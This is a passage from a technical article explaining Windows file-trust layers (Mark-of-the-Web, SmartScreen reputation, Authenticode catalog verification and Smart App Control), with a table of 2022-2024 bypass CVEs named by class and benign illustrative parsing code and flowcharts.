&lt;p&gt;Alongside the propagation campaign, Microsoft also shipped Smart App Control with Windows 11 22H2 in September 2022 [@blogs-windows-com-2022-update] (Panos Panay&apos;s launch announcement). SAC is the integration layer that brings the third trust layer -- the catalog of trust we are about to formalise -- into the same policy decision as MOTW and SmartScreen. Microsoft Learn&apos;s SAC overview [@learn-microsoft-com-control-overview] describes it as &lt;em&gt;&quot;an app execution control feature that combines Microsoft&apos;s app intelligence services and Windows&apos; code integrity features.&quot;&lt;/em&gt; It also documents a silent auto-disable behaviour we will return to in §9 as one of the article&apos;s headline open problems.&lt;/p&gt;
&lt;h3&gt;Anchoring each generation to a person&lt;/h3&gt;
&lt;p&gt;The 2022-2024 arc has names attached to each disclosure. The history is worth pinning to people because the engineering choices were not made by an OS, they were made by humans:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;CVE&lt;/th&gt;
&lt;th align=&quot;right&quot;&gt;Year&lt;/th&gt;
&lt;th&gt;Class&lt;/th&gt;
&lt;th&gt;Reporter / disclosing org&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;CVE-2022-41091&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;2022&lt;/td&gt;
&lt;td&gt;Container-file MOTW propagation&lt;/td&gt;
&lt;td&gt;Will Dormann / Bill Demirkapi (MSRC) analysis&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2022-44698&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;2022&lt;/td&gt;
&lt;td&gt;Malformed-Authenticode fail-open&lt;/td&gt;
&lt;td&gt;Mitja Kolsek (0patch); Patrick Schläpfer (HP Wolf); Will Dormann&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2023-24880&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;2023&lt;/td&gt;
&lt;td&gt;MSI variant of the same fail-open&lt;/td&gt;
&lt;td&gt;Benoit Sevens (Google TAG)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2023-36025&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;2023&lt;/td&gt;
&lt;td&gt;&lt;code&gt;.url&lt;/code&gt; SmartScreen-not-invoked&lt;/td&gt;
&lt;td&gt;Anonymous via MSRC; Peter Girnus et al. (Trend Micro / ZDI)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2024-21412&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;2024&lt;/td&gt;
&lt;td&gt;Chained-shortcut SFB (Water Hydra / DarkGate)&lt;/td&gt;
&lt;td&gt;Peter Girnus (Trend Micro ZDI)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2024-29988&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;2024&lt;/td&gt;
&lt;td&gt;Bypass-of-the-bypass&lt;/td&gt;
&lt;td&gt;Peter Girnus (Trend Micro ZDI); Lenz and Stolyarov (Google TAG)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CVE-2024-38217&lt;/td&gt;
&lt;td align=&quot;right&quot;&gt;2024&lt;/td&gt;
&lt;td&gt;LNK extended-path stomping&lt;/td&gt;
&lt;td&gt;Joe Desimone (Elastic Security Labs)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The pattern reveals itself when you read the column titles. None of these are cryptographic breaks. None of them attack the SHA-256 hash, the PKCS#7 signature, the certificate chain, or the publisher key. Every single one is a propagation, parser, or canonicalisation failure -- a code path that either did not carry MOTW forward, did not fail-closed on a parse error, or did not invoke the SmartScreen prompt at all.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every CVE in this article is a missing MOTW, an unparsed signature, or a canonicalisation reorder. Not a broken hash function. Not a forged certificate. Not a chosen-message attack. The trust primitives Windows has shipped since the late 1990s (NTFS alternate data streams, PKCS#7 SignedData, Authenticode SpcIndirectDataContent, SHA-256) remain unbroken. The bugs live in the code that decides &lt;em&gt;when to read&lt;/em&gt;, &lt;em&gt;when to verify&lt;/em&gt;, and &lt;em&gt;what to do on a parse error&lt;/em&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;By 2024 the central pattern is clear, but stating it leaves one question: what&apos;s the &lt;em&gt;unifying&lt;/em&gt; insight that makes all three trust layers work as a single system?&lt;/p&gt;
&lt;h2&gt;5. The Catalog of Trust: Three Decisions, Not One&lt;/h2&gt;
&lt;p&gt;The synthesis is small enough to fit on a sticky note. Windows file trust is not one decision. It is &lt;em&gt;three&lt;/em&gt; independent decisions stacked on top of each other.&lt;/p&gt;
&lt;p&gt;The three decisions ask three different questions of three different systems:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;The OS asks the file system, &lt;em&gt;where did this come from?&lt;/em&gt;&lt;/strong&gt; The answer is the MOTW &lt;code&gt;Zone.Identifier&lt;/code&gt; ADS. The contract is propagation: every code path that copies, extracts, mounts, or saves the file must honour the contract or the answer is lost.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The OS asks the cloud, &lt;em&gt;what is this file&apos;s reputation?&lt;/em&gt;&lt;/strong&gt; The answer is the SmartScreen Application Reputation verdict (and, for SAC and WDAC + ISG, the Intelligent Security Graph verdict, which uses the same backend). The contract is fail-closed on lookup error: if the SHA-256 hash and Authenticode publisher identity cannot be evaluated, the system must default to the warning, not skip it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The OS asks a signed catalog, &lt;em&gt;is this file&apos;s hash vouched for by a publisher Microsoft trusts?&lt;/em&gt;&lt;/strong&gt; The answer comes from &lt;code&gt;WinVerifyTrust&lt;/code&gt; [@learn-microsoft-com-wintrust-winverifytrust] falling through to a catalog lookup via &lt;code&gt;CryptCATAdminCalcHashFromFileHandle&lt;/code&gt; [@learn-microsoft-com-mscat-cryptcatadmincalchashfromfilehandl] and the catalog walk under &lt;code&gt;%SystemRoot%\System32\CatRoot&lt;/code&gt;. This is the &lt;em&gt;off-line&lt;/em&gt; trust root: it requires no cloud, no telemetry, and no graduated score.&lt;/li&gt;
&lt;/ol&gt;

A PKCS#7 / CMS `SignedData` container whose content is a list of cryptographic hashes plus per-member attributes (`OSAttr`, `HWID`, `MemberInfo`). A single signature vouches for the integrity of every listed file at once. The format has been the WHQL driver-signing primitive since Windows 2000 (Microsoft Learn, *Catalog files and digital signatures* [@learn-microsoft-com-catalog-files]) and reuses the `SpcIndirectDataContent` structure defined in the 2008 *Windows Authenticode Portable Executable Signature Format* specification [@download-microsoft-com-d599bac8184a-authenticodepedocx].
&lt;p&gt;Calling the three-layer composition a &quot;catalog of trust&quot; makes the symmetry explicit. Origin gives you provenance. Reputation gives you experience. Signature gives you attribution. The bypass class in the 2022-2024 arc is whichever layer has no answer: CVE-2022-41091 was the origin layer with no answer (MOTW not propagated through the ISO mount); CVE-2022-44698 was the reputation layer with no answer (the lookup errored out); CVE-2023-36025 was again the reputation layer with no answer, this time because the consuming code did not invoke it at all.&lt;/p&gt;

Windows file trust is not one decision, it is three -- where did this come from, what does the world think of it, and who vouches for it? Each layer answers a different question, and the bypass class is whichever layer is *missing* its answer.

flowchart TD
    File[&quot;Downloaded file -- on disk&quot;]
    Origin[&quot;LAYER 1: Origin -- Zone.Identifier ADS -- (MOTW)&quot;]
    Reputation[&quot;LAYER 2: Reputation -- SmartScreen / ISG -- (file hash + cert + URL)&quot;]
    Catalog[&quot;LAYER 3: Catalog signature -- WinVerifyTrust fall-through -- (CatRoot / CatRoot2)&quot;]
    SAC[&quot;Smart App Control -- (WDAC policy)&quot;]
    Verdict{&quot;Run / Warn / Block&quot;}
    File --&amp;gt; Origin
    File --&amp;gt; Reputation
    File --&amp;gt; Catalog
    Origin --&amp;gt; SAC
    Reputation --&amp;gt; SAC
    Catalog --&amp;gt; SAC
    SAC --&amp;gt; Verdict
&lt;p&gt;The breakthrough that crystallised in late 2022 is treating the three not as separate features but as a &lt;em&gt;layered, fail-closed defence with explicit propagation rules&lt;/em&gt;. Origin must propagate across every writer. Reputation must fail-closed on parser failure. Signature must be available even when the cloud is unreachable. And one decision, the one that finally executes, must compose all three.&lt;/p&gt;
&lt;p&gt;Smart App Control is the canonical example of &quot;all three layers composed.&quot; Microsoft Learn&apos;s SAC overview [@learn-microsoft-com-control-overview] describes the policy: in Enforcement mode, SAC blocks every binary that is not (a) recognised as known-good by the app intelligence service or (b) signed by a certificate chained to a CA in the Microsoft Trusted Root Program. The first clause is the reputation layer. The second clause is the catalog/signature layer. And both clauses are conditioned on the trigger: the file has MOTW, the launch goes through the Shell, and the kernel-mode block path engages before the binary maps. The first clause depends on the third trust layer because the Trusted Root signature is the off-line escape hatch that lets SAC run when the cloud is unreachable.&lt;/p&gt;

A Windows 11 22H2+ execution-control feature, documented at Microsoft Learn [@learn-microsoft-com-control-overview], that runs in one of three modes -- Off, Evaluation, or Enforcement. It is fundamentally a WDAC policy whose decision input is the Intelligent Security Graph reputation backend (the same one SmartScreen and WDAC + ISG consume). It is fail-closed in Enforcement mode and clean-install-only.

Microsoft&apos;s cloud-side reputation backend, used by WDAC and Smart App Control [@learn-microsoft-com-security-graph]. It uses the same telemetry and machine-learning analytics that power SmartScreen and Microsoft Defender Antivirus. WDAC consumes it via &quot;policy rule option 14&quot; (`Enabled:Intelligent Security Graph Authorization`). Positive ISG verdicts are cached on disk as the `$KERNEL.SMARTLOCKER.ORIGINCLAIM` NTFS extended attribute so subsequent boots can skip the cloud call.
&lt;p&gt;So that is the three-layer architecture and its integration point. With the framing established, we can finally describe what production looks like in Windows 11 24H2 in 2025.&lt;/p&gt;
&lt;h2&gt;6. State of the Art: Windows 11 24H2 in 2025&lt;/h2&gt;
&lt;p&gt;What does file trust look like in production? Six sub-systems, told from the bottom up.&lt;/p&gt;
&lt;h3&gt;6.1 MOTW today&lt;/h3&gt;
&lt;p&gt;Every supported Windows SKU since Windows 10 reads and writes the &lt;code&gt;Zone.Identifier&lt;/code&gt; ADS through the same vocabulary defined in 2004. The on-disk format is the UTF-16 INI block from MS-FSCC [@learn-microsoft-com-8c39-2516a9df36e8]. Microsoft Edge in 2025 writes a stream that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[ZoneTransfer]
ZoneId=3
ReferrerUrl=&amp;lt;origin page URL&amp;gt;
HostUrl=&amp;lt;payload URL&amp;gt;
LastWriterPackageFamilyName=Microsoft.MicrosoftEdge_8wekyb3d8bbwe
AppZoneId=3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The full key set is documented across two Microsoft Learn pages. &lt;code&gt;ZoneId&lt;/code&gt; and the conceptual &lt;code&gt;ReferrerUrl&lt;/code&gt; and &lt;code&gt;HostUrl&lt;/code&gt; keys are in the MS-FSCC &lt;code&gt;Zone.Identifier&lt;/code&gt; reference [@learn-microsoft-com-8c39-2516a9df36e8]. The &lt;code&gt;AppDefinedZoneId&lt;/code&gt; and &lt;code&gt;LastWriterPackageFamilyName&lt;/code&gt; keys, added in the Windows 10 era, are on the &lt;code&gt;IZoneIdentifier2&lt;/code&gt; reference [@learn-microsoft-com-apis-mt243886vvs85]).&lt;/p&gt;
&lt;p&gt;The supported write surface is &lt;code&gt;IAttachmentExecute&lt;/code&gt;, defined in &lt;code&gt;shobjidl_core.h&lt;/code&gt;. Microsoft Learn&apos;s interface reference [@learn-microsoft-com-shobjidlcore-iattachmentexecute] enumerates its methods: &lt;code&gt;CheckPolicy&lt;/code&gt;, &lt;code&gt;Execute&lt;/code&gt;, &lt;code&gt;Prompt&lt;/code&gt;, &lt;code&gt;Save&lt;/code&gt;, &lt;code&gt;SaveWithUI&lt;/code&gt;, &lt;code&gt;SetClientGuid&lt;/code&gt;, &lt;code&gt;SetFileName&lt;/code&gt;, &lt;code&gt;SetLocalPath&lt;/code&gt;, &lt;code&gt;SetReferrer&lt;/code&gt;, &lt;code&gt;SetSource&lt;/code&gt;. A browser-style caller does &lt;code&gt;CoCreateInstance(CLSID_AttachmentServices, ...)&lt;/code&gt; followed by &lt;code&gt;SetClientGuid&lt;/code&gt;, &lt;code&gt;SetSource&lt;/code&gt;, &lt;code&gt;SetLocalPath&lt;/code&gt;, &lt;code&gt;SetReferrer&lt;/code&gt;, &lt;code&gt;SetFileName&lt;/code&gt;, and finally &lt;code&gt;Save&lt;/code&gt; (which writes the ADS and triggers the registered AV/AMSI scanner) and &lt;code&gt;Execute&lt;/code&gt; (which displays the Attachment Manager prompt before launching).&lt;/p&gt;
&lt;p&gt;{&lt;code&gt; // Simulates the contents of a typical Edge-written Zone.Identifier // stream and walks through what each key means. const ads = \&lt;/code&gt;[ZoneTransfer]
ZoneId=3
ReferrerUrl=
HostUrl=
LastWriterPackageFamilyName=Microsoft.MicrosoftEdge_8wekyb3d8bbwe
AppZoneId=3`;&lt;/p&gt;
&lt;p&gt;const URLZONE_NAMES = [
  &apos;URLZONE_LOCAL_MACHINE&apos;,
  &apos;URLZONE_INTRANET&apos;,
  &apos;URLZONE_TRUSTED&apos;,
  &apos;URLZONE_INTERNET&apos;,
  &apos;URLZONE_UNTRUSTED&apos;,
];&lt;/p&gt;
&lt;p&gt;function parseZoneIdentifier(text) {
  const result = {};
  let inBlock = false;
  for (const line of text.split(/\r?\n/)) {
    if (line.trim() === &apos;[ZoneTransfer]&apos;) { inBlock = true; continue; }
    if (!inBlock || !line.includes(&apos;=&apos;)) continue;
    const [k, ...rest] = line.split(&apos;=&apos;);
    result[k.trim()] = rest.join(&apos;=&apos;).trim();
  }
  return result;
}&lt;/p&gt;
&lt;p&gt;const fields = parseZoneIdentifier(ads);
console.log(&apos;ZoneId:&apos;, fields.ZoneId,
  &apos;(&apos; + URLZONE_NAMES[Number(fields.ZoneId)] + &apos;)&apos;);
console.log(&apos;HostUrl:&apos;, fields.HostUrl);
console.log(&apos;ReferrerUrl:&apos;, fields.ReferrerUrl);
console.log(&apos;LastWriterPackageFamilyName:&apos;,
  fields.LastWriterPackageFamilyName);
console.log(&apos;\n# PowerShell equivalent:&apos;);
console.log(&apos;# Get-Content -Path foo.exe -Stream Zone.Identifier&apos;);
`}&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;IZoneIdentifier&lt;/code&gt; interfaces -- &lt;code&gt;IZoneIdentifier&lt;/code&gt; from XP SP2 and &lt;code&gt;IZoneIdentifier2&lt;/code&gt; with the new keys -- are the lower-level read/write surface for the ADS itself, useful when a caller wants to inspect or modify the stream without going through the full Attachment Execution Service path. The cost of bypassing &lt;code&gt;IAttachmentExecute&lt;/code&gt; is exactly that: skipping the Attachment Manager hooks (AMSI, the registered AV scanner). EDR vendors who write MOTW out-of-band must go through the COM path, not directly through &lt;code&gt;WriteFile&lt;/code&gt;, or they silently disable the documented integration.&lt;/p&gt;
&lt;h3&gt;6.2 SmartScreen Application Reputation today&lt;/h3&gt;
&lt;p&gt;When a process with MOTW = Internet Zone launches, SmartScreen sends three signals to Microsoft&apos;s cloud, all on the consumer side of the &lt;code&gt;IAttachmentExecute::Execute&lt;/code&gt; path:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The &lt;strong&gt;file-hash signal&lt;/strong&gt;: SHA-256 of the file content.&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;publisher signal&lt;/strong&gt;: the Authenticode certificate identity from the PE Attribute Certificate Table -- the certificate&apos;s subject fields, thumbprint, and chain. The Microsoft Learn reputation-for-developers page [@learn-microsoft-com-smartscreen-reputation] is unambiguous about one thing: EV classification is not a reputation factor (the verbatim Microsoft statement is in the PullQuote below).&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;URL signal&lt;/strong&gt;: the &lt;code&gt;HostUrl&lt;/code&gt; and &lt;code&gt;ReferrerUrl&lt;/code&gt; from the MOTW ADS, plus the navigation URL if the launch was initiated from a browser.&lt;/li&gt;
&lt;/ol&gt;

EV certificates no longer bypass SmartScreen. Years ago, signing files with an Extended Validation (EV) code signing certificate would result in positive SmartScreen reputation by default, but this behavior no longer exists. -- Microsoft Learn, *SmartScreen reputation for Windows app developers*

The cloud-backed file-and-publisher reputation oracle that shipped with Internet Explorer 9 in 2010 and was integrated into the Windows Shell with Windows 8 in October 2012. Today it is queried via the Microsoft Defender SmartScreen [@learn-microsoft-com-defender-smartscreen] overview page&apos;s documented signals (publisher + file hash + URL). The backend returns &quot;known good,&quot; &quot;known bad,&quot; or &quot;unknown&quot;; the unknown case triggers the two-stage &quot;Windows protected your PC&quot; prompt.
&lt;p&gt;The privacy posture is documented but not exhaustively detailed: the file hash, the certificate identity, and the URL are sent to Microsoft. The cloud-side ledger refreshes on a 24-hour cadence per the ISG documentation [@learn-microsoft-com-security-graph]. That has a practical implication you might not expect: a binary that was flagged as suspicious at 09:00 may be re-flagged as known-good at 09:00 the next day, depending on what telemetry rolled in.&lt;/p&gt;
&lt;p&gt;The two-stage UX is the user-visible artefact. Stage one is the &quot;Windows protected your PC -- Microsoft Defender SmartScreen prevented an unrecognized app from starting&quot; dialog whose only button is &quot;Don&apos;t run.&quot; Stage two requires a click on &quot;More info&quot; before the publisher field appears and a &quot;Run anyway&quot; button becomes available. The friction is intentional: a single oblivious click cannot launch an unreputed binary.&lt;/p&gt;
&lt;h3&gt;6.3 The Authenticode catalog file format&lt;/h3&gt;
&lt;p&gt;A catalog file is a PKCS#7 / CMS &lt;code&gt;SignedData&lt;/code&gt; structure. The contained &lt;code&gt;ContentInfo&lt;/code&gt; is a Microsoft-defined &lt;code&gt;SpcIndirectDataContent&lt;/code&gt; blob, identical in shape to the one inside an embedded Authenticode signature in a PE file. The 2008 &lt;em&gt;Windows Authenticode Portable Executable Signature Format&lt;/em&gt; spec [@download-microsoft-com-d599bac8184a-authenticodepedocx] and the current PE Format reference [@learn-microsoft-com-pe-format] are the load-bearing primaries.&lt;/p&gt;
&lt;p&gt;The catalog&apos;s &lt;code&gt;signedData.encapContentInfo.eContent&lt;/code&gt; lists &lt;em&gt;members&lt;/em&gt;: for each member, a hash (SHA-1 historically, SHA-256 on modern catalogs), a hash-algorithm OID, and a set of attribute pairs (&lt;code&gt;OSAttr&lt;/code&gt;, &lt;code&gt;HWID&lt;/code&gt;, &lt;code&gt;MemberInfo&lt;/code&gt;). The catalog is signed once; the single signature covers every listed member hash. The cost model is favourable for bulk-signing scenarios: $O(1)$ signature verification amortises across $N$ member hashes.&lt;/p&gt;
&lt;p&gt;On disk, system catalogs live under &lt;code&gt;%SystemRoot%\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}&lt;/code&gt; and the working store &lt;code&gt;CatRoot2&lt;/code&gt;. Both directories are managed by the Cryptographic Services (&lt;code&gt;cryptsvc&lt;/code&gt;) Windows service. The WDK &lt;em&gt;Catalog files and digital signatures&lt;/em&gt; page [@learn-microsoft-com-catalog-files] records the install path: &lt;em&gt;&quot;The system installs the catalog file to the CatRoot directory under the system directory returned by GetSystemDirectory, for example, %SystemRoot%\System32\CatRoot.&quot;&lt;/em&gt;The &lt;code&gt;{F750E6C3-38EE-11D1-85E5-00C04FC295EE}&lt;/code&gt; GUID has been the canonical Windows system catalog directory identifier since Windows 2000. It is observable on any Windows install and appears in the &lt;code&gt;inf2cat&lt;/code&gt; test-signing documentation; the page that names it most explicitly has moved more than once over the years, but the GUID itself has not changed.&lt;/p&gt;
&lt;p&gt;When code-integrity calls &lt;code&gt;WinVerifyTrust&lt;/code&gt; [@learn-microsoft-com-wintrust-winverifytrust] on a file with no embedded Authenticode signature -- which is, for example, every in-box &lt;code&gt;cmd.exe&lt;/code&gt;, &lt;code&gt;notepad.exe&lt;/code&gt;, and most of &lt;code&gt;%SystemRoot%\System32&lt;/code&gt; -- the trust provider falls through to a catalog lookup. The fall-through is: hash the file with &lt;code&gt;CryptCATAdminCalcHashFromFileHandle&lt;/code&gt; [@learn-microsoft-com-mscat-cryptcatadmincalchashfromfilehandl], walk catalogs with &lt;code&gt;CryptCATAdminEnumCatalogFromHash&lt;/code&gt;, and if a match is found, re-verify the &lt;em&gt;catalog&apos;s&lt;/em&gt; signature against the same chain rules. The path is essentially:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;verify(file) :=
    if embedded_signature(file) is present:
        return WinVerifyTrust(file, WINTRUST_ACTION_GENERIC_VERIFY_V2)
    else:
        h := CryptCATAdminCalcHashFromFileHandle(file)
        cat := CryptCATAdminEnumCatalogFromHash(h)
        if cat == NULL: return TRUST_E_NOSIGNATURE
        return WinVerifyTrust(cat, WINTRUST_ACTION_GENERIC_VERIFY_V2)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;{`
// JavaScript pseudocode model of WinVerifyTrust&apos;s catalog fall-through.
// Demonstrates why cmd.exe, which has no embedded Authenticode signature,
// still verifies as Microsoft-signed in production.&lt;/p&gt;
&lt;p&gt;// 1. A simulated CatRoot2 index: catalog file -&amp;gt; { member-hash -&amp;gt; attrs }
const catRoot2 = {
  &apos;nt5.cat&apos;: {
    &apos;aa11bb22...cmd.exe.hash&apos;: {
      member: &apos;cmd.exe&apos;,
      osAttr: &apos;2:6.4,2:10.0&apos;, // Windows 8 and 10+
    },
    &apos;cc33dd44...notepad.exe.hash&apos;: {
      member: &apos;notepad.exe&apos;,
      osAttr: &apos;2:10.0&apos;,
    },
  },
  // ...thousands more in real CatRoot2
};
const catSigner = &apos;CN=Microsoft Windows, O=Microsoft Corporation&apos;;&lt;/p&gt;
&lt;p&gt;function calcHash(file) {
  // Real implementation: CryptCATAdminCalcHashFromFileHandle (SHA-256)
  return file + &apos;.hash&apos;;
}&lt;/p&gt;
&lt;p&gt;function enumCatalogFromHash(h) {
  for (const [catFile, members] of Object.entries(catRoot2)) {
    if (h in members) return { catFile, member: members[h] };
  }
  return null;
}&lt;/p&gt;
&lt;p&gt;function winVerifyTrust(target) {
  if (target.embeddedSignature) {
    return { ok: true, signer: target.embeddedSignature.signer };
  }
  const h = calcHash(target.name);
  const cat = enumCatalogFromHash(h);
  if (!cat) return { ok: false, status: &apos;TRUST_E_NOSIGNATURE&apos; };
  // The catalog&apos;s PKCS#7 signature has been pre-verified at this point
  return { ok: true, signer: catSigner, viaCatalog: cat.catFile };
}&lt;/p&gt;
&lt;p&gt;const cmdExe = { name: &apos;aa11bb22...cmd.exe&apos;, embeddedSignature: null };
const result = winVerifyTrust(cmdExe);
console.log(result);
// { ok: true, signer: &apos;... Microsoft Windows ...&apos;, viaCatalog: &apos;nt5.cat&apos; }
`}&lt;/p&gt;
&lt;p&gt;That fall-through is how unsigned in-box Windows binaries verify as Microsoft-trusted at load time. It is also how WHQL driver packages work, and it is the substrate the Trusted Root branch of Smart App Control relies on for the off-line case.&lt;/p&gt;

flowchart TD
    Start[&quot;WinVerifyTrust(file, -- WINTRUST_ACTION_GENERIC_VERIFY_V2)&quot;]
    Embed{&quot;File has -- embedded sig?&quot;}
    Hash[&quot;CryptCATAdminCalcHashFromFileHandle&quot;]
    Enum[&quot;CryptCATAdminEnumCatalogFromHash&quot;]
    Found{&quot;Catalog -- found?&quot;}
    VerifyEmb[&quot;Verify embedded PKCS#7&quot;]
    VerifyCat[&quot;Verify catalog PKCS#7&quot;]
    Ok[&quot;TRUST_OK&quot;]
    NoSig[&quot;TRUST_E_NOSIGNATURE&quot;]
    Start --&amp;gt; Embed
    Embed --&amp;gt;|&quot;yes&quot;| VerifyEmb
    VerifyEmb --&amp;gt; Ok
    Embed --&amp;gt;|&quot;no&quot;| Hash
    Hash --&amp;gt; Enum
    Enum --&amp;gt; Found
    Found --&amp;gt;|&quot;yes&quot;| VerifyCat
    VerifyCat --&amp;gt; Ok
    Found --&amp;gt;|&quot;no&quot;| NoSig
&lt;h3&gt;6.4 The relationship to WDAC and Smart App Control&lt;/h3&gt;
&lt;p&gt;Windows Defender Application Control (WDAC; renamed &quot;App Control for Business&quot; in 2023, though the WDAC label persists in policy XML and most documentation) is a kernel-mode code-integrity engine. It enforces an explicit policy of allowed publishers, file hashes, and paths. By itself, WDAC is the strict-allowlist counterpart to SmartScreen&apos;s reputation-based warning. With the &lt;code&gt;Enabled:Intelligent Security Graph Authorization&lt;/code&gt; rule -- &quot;policy rule option 14&quot; [@learn-microsoft-com-security-graph] -- WDAC also accepts ISG verdicts as authorisation for files the policy did not explicitly list.&lt;/p&gt;
&lt;p&gt;The Microsoft Learn ISG page is unambiguous about the mechanism: &lt;em&gt;&quot;The ISG isn&apos;t a &apos;list&apos; of apps. Rather, it uses the same vast security intelligence and machine learning analytics that power Microsoft Defender SmartScreen and Microsoft Defender Antivirus ... processed every 24 hours. As a result, the decision from the cloud can change ... Files authorized based on the installer&apos;s reputation will have the &lt;code&gt;$KERNEL.SMARTLOCKER.ORIGINCLAIM&lt;/code&gt; kernel Extended Attribute (EA) written to the file.&quot;&lt;/em&gt;The &lt;code&gt;$KERNEL.SMARTLOCKER.ORIGINCLAIM&lt;/code&gt; NTFS extended attribute is the on-disk cache of a positive ISG verdict. Subsequent boots can skip the cloud call by consulting the EA. The &lt;code&gt;Enabled:Invalidate EAs on Reboot&lt;/code&gt; policy rule is the explicit knob for forcing a re-evaluation on every boot, useful for high-assurance configurations where you do not want a stale verdict to survive a reboot.&lt;/p&gt;
&lt;p&gt;Smart App Control on consumer Windows 11 is, structurally, a WDAC &lt;code&gt;AllowAll&lt;/code&gt; policy minus an ISG-driven blocklist. The decision input is the same ISG backend that powers SmartScreen. The execution point is the same kernel-mode code-integrity engine that enforces enterprise WDAC. The Trusted Root signature branch is the catalog-of-trust off-line escape hatch. Here is how the three signals feed Smart App Control&apos;s gate:&lt;/p&gt;

flowchart TD
    Launch[&quot;ShellExecute on MOTW=3 file&quot;]
    Origin[&quot;Read Zone.Identifier ADS&quot;]
    Trigger{&quot;MOTW=3?&quot;}
    Reputation[&quot;ISG cloud lookup -- (hash + cert + URL)&quot;]
    KnownGood{&quot;ISG verdict = -- known_good?&quot;}
    Signature[&quot;WinVerifyTrust -- (catalog fall-through)&quot;]
    TrustedRoot{&quot;Signer in -- Trusted Root Program?&quot;}
    Allow[&quot;Allow (kernel-mode launch)&quot;]
    Block[&quot;Block (SAC modal, no override)&quot;]
    Launch --&amp;gt; Origin
    Origin --&amp;gt; Trigger
    Trigger --&amp;gt;|&quot;no&quot;| Allow
    Trigger --&amp;gt;|&quot;yes&quot;| Reputation
    Reputation --&amp;gt; KnownGood
    KnownGood --&amp;gt;|&quot;yes&quot;| Allow
    KnownGood --&amp;gt;|&quot;no / unknown&quot;| Signature
    Signature --&amp;gt; TrustedRoot
    TrustedRoot --&amp;gt;|&quot;yes&quot;| Allow
    TrustedRoot --&amp;gt;|&quot;no&quot;| Block
&lt;h3&gt;6.5 The legacy of &quot;Microsoft Defender SmartScreen extension&quot;&lt;/h3&gt;
&lt;p&gt;The phrase &quot;Microsoft Defender SmartScreen extension&quot; appears in third-party guides constantly. It is almost always wrong.&lt;/p&gt;

The only product Microsoft ever shipped as a *browser extension* implementing SmartScreen behaviour was the **Windows Defender Browser Protection** Chrome extension. It was a Microsoft-developed extension that brought SmartScreen URL reputation to Google Chrome on Windows and macOS. Microsoft retired the extension during 2022; users opening Chrome on November 29, 2022 saw a Microsoft-issued in-extension notice [@bleepingcomputer-com-being-retired] reading *&quot;Developer support for this extension is complete and will be expiring soon&quot;* and directing them to Microsoft Edge. The former Chrome Web Store listing [@chrome-google-com-browser-bkbeeeffjjeopflfhgeknacdieedcoblj] now returns no extension page, and the Microsoft Defender SmartScreen overview [@learn-microsoft-com-defender-smartscreen] makes no claim about an active replacement. Today SmartScreen is a built-in Edge component, an OS Settings page (*Reputation-based protection*), and the kernel-adjacent SAC engine. It is *not* a browser extension. The OS-level execution-control path -- `IAttachmentExecute` plus the Attachment Execution Service -- is reachable from the OS and from Edge; it cannot be reached from a Chrome or Firefox extension because the extension API surface does not expose it.
&lt;h3&gt;6.6 What&apos;s left of the security boundary&lt;/h3&gt;
&lt;p&gt;The three-layer architecture is not invulnerable. Three things it does not do, by construction:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;It does not stop a user who clicks &quot;More info -&amp;gt; Run anyway.&quot;&lt;/strong&gt; That branch is deliberate and we will return to why in Section 8.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;It does not protect against well-reputed-but-now-malicious software.&lt;/strong&gt; Elastic&apos;s writeup on Smart App Control names this &lt;em&gt;reputation hijacking&lt;/em&gt;: an attacker compromises or repurposes a binary that genuinely has positive reputation. SmartScreen says &quot;known good&quot; because the file really &lt;em&gt;was&lt;/em&gt; known good before its current use. The class is, in Elastic&apos;s framing, generic to all reputation-based protection systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;It depends on propagators.&lt;/strong&gt; Every &lt;code&gt;.lnk&lt;/code&gt;, &lt;code&gt;.url&lt;/code&gt;, &lt;code&gt;.iso&lt;/code&gt;, and archive extraction path is a potential carrier for the MOTW signal. When one of those paths drops MOTW, the entire catalog of trust silently disengages for that file. That is the whole substance of the 2022-2024 CVE arc, and it is not a closed problem.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The story so far is Windows-internal. Other operating systems have their own catalog-of-trust analogues. None of them have all three layers.&lt;/p&gt;
&lt;h2&gt;7. Beyond the Microsoft Stack: How macOS, Chromium, and Linux Compare&lt;/h2&gt;
